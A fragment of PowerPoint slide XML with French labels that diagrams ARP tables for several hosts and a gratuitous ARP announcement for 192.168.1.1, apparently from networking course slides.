          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="6119813"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="6119813"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="6429376"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="6429376"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1641476" y="5803901"/>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1" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5810251"/>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2" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6119813"/>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3" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6429376"/>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4" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5494338"/>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5" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2913063" y="5494338"/>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6" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="5500688"/>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7" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="119063" y="6738938"/>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8" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1063626" y="5548313"/>
            <a:ext cx="10175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ARP TABLE A</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59" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="217488" y="5853113"/>
            <a:ext cx="474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MAC</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60" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733551" y="5853113"/>
            <a:ext cx="2460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61" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="217488" y="6162676"/>
            <a:ext cx="12311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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bbbb:bbbb:bbbb</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1733551" y="6162676"/>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B050"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5423533"/>
            <a:ext cx="28067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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5429883"/>
            <a:ext cx="27876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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5739446"/>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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="5739446"/>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8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="6049008"/>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9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="6049008"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="6358571"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="6358571"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10844167" y="5733096"/>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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5739446"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6049008"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6358571"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9328104" y="5423533"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12115754" y="5423533"/>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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="5429883"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9321754" y="6668133"/>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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10266317" y="5477508"/>
            <a:ext cx="10175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ARP TABLE A</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81" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9420179" y="5782308"/>
            <a:ext cx="474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MAC</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82" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10936242" y="5782308"/>
            <a:ext cx="2460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83" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9420179" y="6091871"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="84" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10936242" y="6091871"/>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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="271930"/>
            <a:ext cx="27876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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="581493"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="581493"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="891055"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="891055"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="1200618"/>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11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="1200618"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7749934" y="575143"/>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3" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="581493"/>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4" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="891055"/>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5" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1200618"/>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6" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6233871" y="265580"/>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7" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9021521" y="265580"/>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8" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="271930"/>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9" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6227521" y="1510180"/>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0" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7172084" y="319555"/>
            <a:ext cx="9108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ARP TABLE C</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101" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="624355"/>
            <a:ext cx="474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MAC</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102" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="624355"/>
            <a:ext cx="2460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103" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="933918"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="933918"/>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70C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="4481285"/>
            <a:ext cx="28194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Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131763" y="4487635"/>
            <a:ext cx="2800350" cy="3111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Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131763" y="4798785"/>
            <a:ext cx="9969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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1128713" y="4798785"/>
            <a:ext cx="180340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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131763" y="5108348"/>
            <a:ext cx="9969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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1128713" y="5108348"/>
            <a:ext cx="180340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Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1128713" y="4792435"/>
            <a:ext cx="0" cy="631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4" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="4798785"/>
            <a:ext cx="28130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6" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5108348"/>
            <a:ext cx="28130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7" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="131763" y="4481285"/>
            <a:ext cx="0" cy="9429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0" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2932113" y="4481285"/>
            <a:ext cx="0" cy="9429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1" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="4487635"/>
            <a:ext cx="28130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3" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125413" y="5417910"/>
            <a:ext cx="28130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6" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1284288" y="4533673"/>
            <a:ext cx="4413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Hote</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107" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1676401" y="4533673"/>
            <a:ext cx="193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A</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108" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="223838" y="4843235"/>
            <a:ext cx="4381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MAC</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109" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220788" y="4843235"/>
            <a:ext cx="11969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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</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110" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="223838" y="5151210"/>
            <a:ext cx="228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111" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1220788" y="5151210"/>
            <a:ext cx="935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192.168.1.1</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113" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1208089" y="4852596"/>
            <a:ext cx="734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sz="1400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ffff:ffff:ffff</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="114" name="Connecteur droit avec flèche 113"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1961842" y="3709592"/>
            <a:ext cx="330877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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="115" name="Tableau 114"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1807563033"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2167027" y="3098615"/>
          <a:ext cx="2465658" cy="518160"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="309251">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>ARP </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Gratuitous</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>Arp gratuit pour 192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="117" name="Connecteur droit avec flèche 116"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6347195" y="3718775"/>
            <a:ext cx="330877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8" name="Connecteur droit avec flèche 117"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5845996" y="2876765"/>
            <a:ext cx="1" cy="72165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9" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9428743" y="6090161"/>
            <a:ext cx="734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sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
